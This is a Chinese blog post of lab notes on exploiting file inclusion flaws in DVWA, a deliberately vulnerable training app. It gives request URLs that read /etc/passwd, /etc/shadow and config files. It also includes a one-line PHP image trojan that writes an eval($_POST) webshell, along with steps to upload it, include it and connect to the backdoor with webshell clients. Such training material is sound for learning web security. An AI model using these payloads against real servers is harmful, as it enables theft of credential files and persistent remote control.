zoukankan      html  css  js  c++  java
  • 黑客攻防笔记Day02

    文件包含漏洞渗透攻击

    1. 项目实验环境

     

    2、原理及危害

    文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以
    通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,
    此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远
    程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一
    个远程的文件)。服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含
    一个恶意文件,而我们可以构造这个恶意文件来达到自己的目的。
    1. 文件包含(File Inclusion)即程序通过[包含函数]调用本地或远程文件,以此来实现拓展功能 2. 被包含的文件可以是各种文件格式,而当文件里面包含恶意代码,则会形成远程命令执行或文件上传漏洞 3. 文件包含漏洞主要发生在有包含语句的环境中,例如PHP所具备include、require等包含函数 文件包含分为两类: 本地文件包含LFI(Local File Inclusion) 当被包含的文件在服务器本地时,就形成本地文件包含 远程文件包含RFI(Remote File Inclusion) 当被包含的文件在第三方服务器时,叫做远程文件包含

     3、低安全级别渗透

     

     

    3.1本地文件包含

    访问本地系统账号信息及其它敏感信息 
    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/passwd

    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/shadow

    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini

    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf

    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf
     

     

    3.2 本地文件包含+webshell

    1. 制作一句话图片木马 eg. yangjie.jpg 
    <?fputs(fopen("shell20.php","w"),'<?php eval($_POST[yangjie]);?>')?>
    2. 上传图片木马文件

    3. 执行文件包含并生成后门

    4. 通过菜刀连接webshell
    杨哥提示: /var/www/dvwa/hackable/uploads //dvwa文件上传访问的目录
    yangge.jpg /var/www/dvwa/vulnerabilities/fi
    //dvwa文件包含访问的目录 shell20.php

    制作一句话木马

     

    上传图片木马文件

     

     执行文件包含并生成后门

    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/2.jpg
    或者使用该图片的绝对路径
    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/var/www/dvwa/hackable/uploads /2.jpg
     

     

     通过菜刀链接webshell

    http://192.168.208.140/dvwa/vulnerabilities/fi/shell20.php
     

     

     3.3远程文件包含+webshell

    建立远程服务器,本项目使用kali作为远程服务器

     

    验证远程服务器提供文件正常

     

     

     用蚁剑远程连接控制

     

    4、中安全级别渗透

     

     4.1本地文件包含

    同低级别一样,仍然能执行低级别的漏洞利用
    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/passwd 
    
    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/shadow 
    
    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini 
    
    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf 
    
    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf

     

     

     4.2本地文件包含+webshell

    同低安全级别一样
    
    1.制作一句话木马
    <?fputs(fopen("shell200.php","w"),'<?php eval($_POST[yangjie]);?>')?> 
    2. 上传图片木马文件
    3. 执行文件包含并生成后门
    4. 通过菜刀连接webshell

    制作一句木马

     

    上传图片木马文件

     

    执行文件包含并生成后门

    http://192.168.208.140/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/hlw.jpg
    或者使用该图片的绝对路径

     

     

     

     

     4.3远程文件包含+webshell

    建立远程服务器,本项目使用kali 作为远程服务器

     

     

     

     

     蚁剑远程连接

     

     5.高安全级别渗透同上面两种一样

     
  • 相关阅读:
    Java基础教程(20)--数字和字符串
    Java基础教程(19)--Object类
    python 选择和循环结构
    购物清单
    第五次安卓作业(计算器和增删改查)
    第四次安卓作业(用户添加)
    第三次安卓作业(用户登录)
    第二次安卓作业(九宫格)
    5.22作业
    5.29作业
  • 原文地址:https://www.cnblogs.com/Leisy/p/14643143.html
Copyright © 2011-2022 走看看